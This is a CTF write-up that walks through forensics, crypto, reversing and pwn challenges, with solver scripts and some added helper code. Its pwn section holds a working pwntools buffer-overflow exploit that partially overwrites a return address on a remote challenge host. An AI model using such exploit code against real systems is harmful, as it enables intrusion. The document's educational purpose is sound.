0xfffffa8001bde440:WeChat.exe 296 596 0 ------ 2021-03-17 07:07:40 UTC+0000
```

Spotted the WeChat application; guessed the "py" went through WeChat. Dumped the WeChat process and searched for Nep{ in the dmp of the WeChat process with pid=1152 to get the flag
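As an added example of what to do with a listing like the one above (my code, not from the writeup or from Volatility itself): a parser for pstree output that recovers the parent/child structure, so processes of interest can be found by name, their children listed, their ancestry walked and exited entries flagged. It runs over a constructed sample laid out like the output above; the function names are my own.

```python
import re

# Constructed sample in the layout of Volatility 2.6 `pstree` output: leading dots give the depth,
# image names are truncated to 14 characters, and Hnds is "------" for a process that has exited.
SAMPLE_PSTREE = """\
Volatility Foundation Volatility Framework 2.6
Name                                                  Pid   PPid   Thds   Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
 0xfffffa800418eb30:WeChat.exe                       2468   2828      0 ------ 2021-03-17 07:48:18 UTC+0000
. 0xfffffa8001cec060:WeChat.exe                      1152   2468     44    825 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8001eb8320:wechatweb.exe                  3036   1152      6    165 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8003bf7060:WeChatApp.exe                  2224   1152     49    568 2021-03-17 08:11:37 UTC+0000
 0xfffffa8003e292d0:explorer.exe                     1428   1336     38   1156 2021-03-17 06:50:14 UTC+0000
. 0xfffffa8002a1bb30:DumpIt.exe                      2932   1428      2     45 2021-03-17 08:18:23 UTC+0000
. 0xfffffa8001ec2060:VeraCrypt.exe                   2260   1428      5    376 2021-03-17 07:16:39 UTC+0000
"""

LINE_RE = re.compile(
    r"^(?P<depth>\.*)\s*(?P<offset>0x[0-9a-fA-F]+):(?P<name>\S+)\s+"
    r"(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<thds>\d+)\s+(?P<hnds>\d+|-+)\s+(?P<time>.+?)\s*$"
)


def parse_pstree(text):
    """Parse pstree output into a list of dicts; banner, header and separator lines do not match and are skipped."""
    procs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        procs.append({
            "offset": d["offset"],
            "name": d["name"],
            "pid": int(d["pid"]),
            "ppid": int(d["ppid"]),
            "threads": int(d["thds"]),
            "handles": None if d["hnds"].startswith("-") else int(d["hnds"]),  # None = exited
            "time": d["time"],
            "depth": len(d["depth"]),
        })
    return procs


def pids_named(procs, name):
    """All PIDs whose image name matches, case-insensitively (names are truncated to 14 chars by the tool)."""
    return [p["pid"] for p in procs if p["name"].lower() == name.lower()]


def children_of(procs, pid):
    return [p["pid"] for p in procs if p["ppid"] == pid]


def ancestry(procs, pid):
    """Walk PPid links upward; stops when the parent is absent from the listing (e.g. it already exited)."""
    by_pid = {p["pid"]: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and by_pid[pid]["ppid"] in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        chain.append(pid)
    return chain


def exited_processes(procs):
    """Entries that are still in the tree but have no handle table any more."""
    return [p["pid"] for p in procs if p["handles"] is None]


if __name__ == "__main__":
    procs = parse_pstree(SAMPLE_PSTREE)
    for pid in pids_named(procs, "WeChat.exe"):
        print(pid, "children:", children_of(procs, pid), "ancestry:", ancestry(procs, pid))
```

Knowing which of the several WeChat.exe entries is the live one (threads and handles present) and which are its children is exactly what decides which PID to dump; the parser makes that a lookup instead of reading the columns by eye.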

65iHot.png

Crypto

Real_Base

After finishing I realized how silly I was: a bidirectional lookup in Python would produce the substitution table directly. Next time for sure!!!

First recover b_char by working backwards

```python
b_char = [''] * 64  # substitution table being recovered from a known (plaintext, encoding) pair


def encode(s, res):
    # res = ''
    binstr = [bin(ord(s[i])).replace('0b', '').zfill(8) for i in range(len(s))]
    p1 = len(binstr) // 3
    p2 = len(binstr) % 3
    part1 = binstr[0:3 * p1]

    for i in range(p1):
        str_p1 = binstr[i * 3] + binstr[i * 3 + 1] + binstr[i * 3 + 2]
        tmp_str = [str_p1[x: x + 6] for x in [0, 6, 12, 18]]
        for n in range(len(tmp_str)):
            num = n + 4 * i
            # each 6-bit group of the known plaintext maps to the character at the same position in res
            b_char[int(tmp_str[n], 2)] = res[n + 4 * i]
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]
        # res += ''.join(tmp_res)

    if p2:
        part2 = binstr[3 * p1:]
        str_p2 = ''.join(part2) + (3 - p2) * '0' * 8
        tmp_str = [str_p2[x: x + 6] for x in [0, 6, 12, 18]][:p2 + 1]
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]
        # res += ''.join(tmp_res)
        # res += '=' * (3 - p2)
    print(b_char)
    return res
```

Result

```python
['', 'b', 'c', 'd', 'e', 'f', '', 'h', '', 'j', '', '', '', 'n', '', '', '', 'r', '', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '', '2', '3', '4', '', '', '7', '', '9', 'A', 'B', 'C', 'D', '', '', '', '', '', 'J', '', 'L', '', 'N', 'O', 'P', 'Q', '', '', 'T', 'U', 'V', '', '', '', 'Z', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
```

Clearly the original base64 alphabet has been altered

So map each character back to its original position and base64-decode to get the flag

```python
import base64
basestr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
newstr = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/'
res = 'tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ='
b64s = ''
for i in res:
    for n in range(len(newstr)):
        if newstr[n] == i:
            b64s += basestr[n]
            break
print(b64s)
print(base64.b64decode(b64s + '='))
```

你们一天天的不写代码,难道是在等爱情吗

There is an image

6hJZp4.jpg

Based on

小银、小盲、小精、小跳….

the guess is

Standard Galactic Alphabet, Braille letters, Dancing Men...

In fact they are

Standard Galactic Alphabet, Braille letters, Braille digits, Dancing Men, variant pigpen, pigpen...

Decoding each accordingly gives:

大kO_TJw}r{1小小大Wa$v0v!?c@bvUm?

A few were not found, but ignore that for now

A W-shaped rail fence with 3 rails gives

大rc{k1@小O小b大_WvaT$UvJ0mvw!??}

Guessing rc -> ep, a Caesar shift gives

大ep{x1@小B小o大_JinG$HiW0zij!??}

Obviously the first character is N, and the later jingshiwoziji (竟是我自己, "it was me all along") is clearly right; combined with the xia小 at the start, guess it is 小丑竟是我自己 ("the clown was me all along"), i.e.

Nep{x1@oChoU_JinG$HiW0zij!??}

Tried it and it is correct
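The rail fence and Caesar steps above, as a general added example (my code, not part of the original writeup): a W-shaped rail fence decoder and encoder for any number of rails, a shift recovery from a known fragment such as rc -> ep, and a Caesar shift that leaves digits, symbols and CJK characters untouched, checked against the two intermediate strings from this challenge. The function names are my own.

```python
def rail_pattern(n, rails):
    """Rail index of each position in the zigzag: 0,1,...,rails-1,...,1,0,1,... (period 2*(rails-1))."""
    period = 2 * (rails - 1)
    return [min(i % period, period - i % period) for i in range(n)]


def rail_fence_encrypt(text, rails):
    """Read the zigzag rail by rail; 1 rail (or fewer) is the identity."""
    if rails < 2:
        return text
    pat = rail_pattern(len(text), rails)
    return ''.join(ch for r in range(rails) for ch, p in zip(text, pat) if p == r)


def rail_fence_decrypt(cipher, rails):
    """Invert the encryption: the ciphertext lists the positions of rail 0 first, then rail 1, ...,
    so sorting positions by (rail, index) gives where each ciphertext character belongs."""
    if rails < 2:
        return cipher
    pat = rail_pattern(len(cipher), rails)
    order = sorted(range(len(cipher)), key=lambda i: (pat[i], i))
    plain = [''] * len(cipher)
    for ch, pos in zip(cipher, order):
        plain[pos] = ch
    return ''.join(plain)


def caesar(text, shift):
    """Shift ASCII letters only; everything else (digits, punctuation, 大/小 markers) passes through."""
    out = []
    for ch in text:
        if 'a' <= ch <= 'z':
            out.append(chr((ord(ch) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= ch <= 'Z':
            out.append(chr((ord(ch) - ord('A') + shift) % 26 + ord('A')))
        else:
            out.append(ch)
    return ''.join(out)


def infer_shift(cipher_fragment, plain_fragment):
    """Shift that maps a known ciphertext letter onto its plaintext letter (e.g. 'rc' -> 'ep' gives 13)."""
    for c, p in zip(cipher_fragment, plain_fragment):
        if c.isascii() and c.isalpha() and p.isascii() and p.isalpha():
            return (ord(p.lower()) - ord(c.lower())) % 26
    raise ValueError("no letter pair to compare")


if __name__ == "__main__":
    # The two intermediate strings from the writeup above.
    decoded = "大kO_TJw}r{1小小大Wa$v0v!?c@bvUm?"
    unfenced = rail_fence_decrypt(decoded, 3)
    shift = infer_shift("rc", "ep")
    print(unfenced)
    print(caesar(unfenced, shift))
```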

Re

hardcsharp

The name says it is C# reversing; dumb as I am, I dragged it into IDA first, silly me, sob

Decompile it with .NET Reflector

The main difficulty in it is an AES routine:

Write the exp and the result pops straight out:

```python
import base64
from Crypto.Cipher import AES

buffer = [0x51, 0x52, 0x57, 0x51, 0x52, 0x57, 0x44, 0x5c, 0x5e, 0x56, 0x5d, 0x12, 0x12, 0x12, 0x12, 0x12,
          0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 18]
key = ''
for b in buffer:
    key += chr(b ^ 0x33)  # the 32-byte key is stored XORed with 0x33

enc = base64.b64decode(b'1Umgm5LG6lNPyRCd0LktJhJtyBN7ivpq+EKGmTAcXUM+0ikYZL4h4QTHGqH/3Wh0')
cipher = AES.new(key.encode(), AES.MODE_ECB)
print(cipher.decrypt(enc))
```

二十六进制 (Base 26)

First time seeing this kind of challenge, quite fun. It seems to convert the input to base 26 and XOR with 7 along the way:

Found the symbols used for 0-25 in base 26; XOR with 7 may still be needed:

This should be the final base-26 number:

Converting it straight back to decimal did not work; a closer look at the code shows it has to be reversed:

exp:

```python
import hashlib
from binascii import b2a_hex

base = b'2163qwe)(*&^%489$!057@#><A'  # symbols for digits 0..25
num = b'6&>27bF'
flag = 0
for n in num:
    flag *= 26
    flag += base.find(n ^ 7)  # undo the XOR 7 before looking the symbol up
flag = hashlib.md5(str(flag).encode()).digest()
print(f'Nep{{{b2a_hex(flag).decode()}}}')
```

password

Android reversing is my favourite part. Unpacking it first, there is also a flag.zip that is encrypted, so the goal is to get this archive's password

There is a .so under lib, the old routine; presumably the .so needs to be reversed too

Opening the apk in jadx shows separate checks on the key and on the plaintext:

The first is the key check, but there is nothing in jadx; drag it into IDA, and Shift+F12 reveals a few key bits: two hex strings and a mysterious string

On closer inspection it is just base64 with a modified alphabet:

Decode the two hex strings and take the key part; at first I forgot they need reversing, ugh (multi-byte data is stored little-endian)

Solving for the key:

```python
import base64
import string

str1 = "7+RmFXP2LWP2L6g3"[::-1] + "==qi7esi"[::-1]  # both halves are stored little-endian, so reverse them
print(str1)
string1 = "abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

print(base64.b64decode(str1.translate(str.maketrans(string1, string2))))
```
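Both this key check and Real_Base above come down to base64 with a permuted alphabet. As an added example (my code, not from the writeup), here is a general decoder and encoder that takes any 64-character alphabet, re-derives the padding instead of trusting it, and rejects characters outside the alphabet; the two alphabets are the ones the writeup recovered and the function names are my own.

```python
import base64
import binascii
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"

# The two permuted alphabets recovered in this writeup.
PW_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ"  # password (apk key check)
RB_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"  # Real_Base


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or "=" in alphabet:
        raise ValueError("alphabet must be 64 distinct characters and must not contain '='")


def custom_b64decode(data: str, alphabet: str) -> bytes:
    """Decode base64 text written in a permuted alphabet by translating it back to the standard
    table. Padding is stripped and recomputed from the length, so a stripped or over-padded
    input still decodes; a length that no base64 encoding can produce is rejected."""
    _check_alphabet(alphabet)
    body = data.rstrip("=")
    unknown = set(body) - set(alphabet)
    if unknown:
        raise ValueError(f"characters not in alphabet: {sorted(unknown)}")
    pad = -len(body) % 4
    if pad == 3:
        raise ValueError("invalid base64 length")
    std = body.translate(str.maketrans(alphabet, STD_ALPHABET))
    return base64.b64decode(std + "=" * pad, validate=True)


def custom_b64encode(raw: bytes, alphabet: str) -> str:
    """Encode with the standard codec, then map each output character into the permuted alphabet."""
    _check_alphabet(alphabet)
    std = base64.b64encode(raw).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def is_valid_custom_b64(data: str, alphabet: str) -> bool:
    try:
        custom_b64decode(data, alphabet)
        return True
    except (ValueError, binascii.Error):
        return False


if __name__ == "__main__":
    # Reversed hex halves from the apk, as in the writeup above.
    print(custom_b64decode("3g6L2PWL2PXFmR+7ise7iq==", PW_ALPHABET))
    print(custom_b64encode(b"Nep", RB_ALPHABET))
```

The translate step is the whole trick: once the permuted alphabet is known, no custom bit-twiddling is needed, and recomputing the padding removes one source of decoding errors when a challenge drops or mangles the trailing `=`.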

The key is: th1s_1s_k3y!!!!!

Now the plaintext check:

It looks a bit like the RC4 seen last time, with a small modification; I cannot write it myself, so grab an RC4 source from the web and tweak it:

```cpp
#include <cstdio>
#include <cstring>
#include <algorithm>
#define Byte unsigned char
using std::swap;

Byte S[256],T[256];
char key[256] = "th1s_1s_k3y!!!!!";
int keylen = strlen(key);

void RC4Init(){
    for(int i = 0;i < 256;i++) S[i] = 256 - i,T[i] = key[i % keylen];
    int j = 0;
    for(int i = 0;i < 256;i++){
        j = (j + S[i] + T[i]) % 256;
        swap(S[i],S[j]);
    }
}

void RC4(Byte *dest,const char *src){
    RC4Init();
    int i = 0,j = 0;
    for(int k = 0;src[k];k++){
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        swap(S[i],S[j]);
        int t = (S[i] + S[j]) % 256;
        dest[k] = src[k] ^ S[t];
    }
}

int main(){
    Byte dest[100] = {0};
    RC4(dest,"\x8b\xd2\xd9\x5d\x95\xff\x7e\x5f\x29\x56\x12\xb9\xef\xec\x8b\xd0\x45");
    puts((char*)dest);
}
```
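A Python port of the modified RC4 above, added as an example (my code, neither the challenge's nor the writeup's): the only change from standard RC4 is the key-scheduling fill, `S[i] = 256 - i` instead of `S[i] = i`, which in a byte-sized S makes S[0] wrap to 0 and reverses the rest. The port exposes that as a flag so the standard and variant keystreams can be compared, and the standard path is checked against the well-known RC4 test vector Key/Plaintext. Function names are my own; the sample plaintext is constructed.

```python
def _ksa(key: bytes, variant: bool) -> list:
    """Key-scheduling algorithm. Standard RC4 fills S with 0..255; the challenge's variant fills it
    with 256 - i, so S[0] = 0 (256 wraps in a byte) and S[1..255] = 255..1 before the key mixing."""
    if not key:
        raise ValueError("key must not be empty")
    S = [(256 - i) & 0xFF for i in range(256)] if variant else list(range(256))
    T = [key[i % len(key)] for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + S[i] + T[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def _prga(S: list, length: int) -> bytes:
    """Pseudo-random generation: identical in both versions."""
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_keystream(key: bytes, length: int, variant: bool = True) -> bytes:
    return _prga(_ksa(key, variant), length)


def rc4_crypt(key: bytes, data: bytes, variant: bool = True) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    ks = rc4_keystream(key, len(data), variant)
    return bytes(a ^ b for a, b in zip(data, ks))


if __name__ == "__main__":
    key = b"th1s_1s_k3y!!!!!"
    sample = b"constructed plaintext"  # constructed, not the challenge's ciphertext
    ct = rc4_crypt(key, sample)
    print(ct.hex(), rc4_crypt(key, ct))
    print(rc4_keystream(key, 8, variant=True).hex(), rc4_keystream(key, 8, variant=False).hex())
```

Because the PRGA is untouched, a decryptor only has to get the initial fill of S right; the `& 0xFF` on the fill is the detail that reproduces the C++ `Byte` truncation of 256 to 0.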

With the archive password, extract the zip inside the apk to get the flag. Perfect.

easymips

Baidu says MIPS is all 32-bit

Without further ado, straight into my IDA 7.5

The encryption process is very clear, so write the exp directly:

```cpp
#include <cstdio>
#include <cstdlib>
#include <cstring>

int main(){
    char enc[100] = "3_isjA0UeQZcNa\\`\\Vf";
    printf("%d\n",strlen(enc));
    for(int i = 0;i < 19;i ++){
        enc[i] += i + 5;
    }
    srand(0x1C5Eu);
    enc[0] ^= ((rand() ^ 0x65) >> 24) + 50;
    enc[5] ^= ((rand() ^ 0x70) >> 24) - 57;
    enc[6] ^= (rand() >> 4) + 48;
    printf("%s\n", enc);
}
```

pwn

送你一朵小红花

First, checksec shows address randomization is on and only three bytes stay constant, so overwrite the low two bytes of the return address; I was too lazy and left the first digit as the original 1. On success it runs cat /flag. The vulnerability is in the read in main; in IDA buf is 8 bytes, and it is a 64-bit program, so 8 bytes of padding plus 8 for rbp, 16 in total

Here is my noob exploit; run it a few times and the flag comes out. No idea whether there is a cleverer method; it took a dozen or so tries to get a result

```python
from pwn import *

context.log_level='debug'
#io = process('./xhh')
io = remote('node2.hackingfor.fun', 32030)

payload = 'a' * 0x10 + '\xe1\x14'

io.send(payload)

io.interactive()
```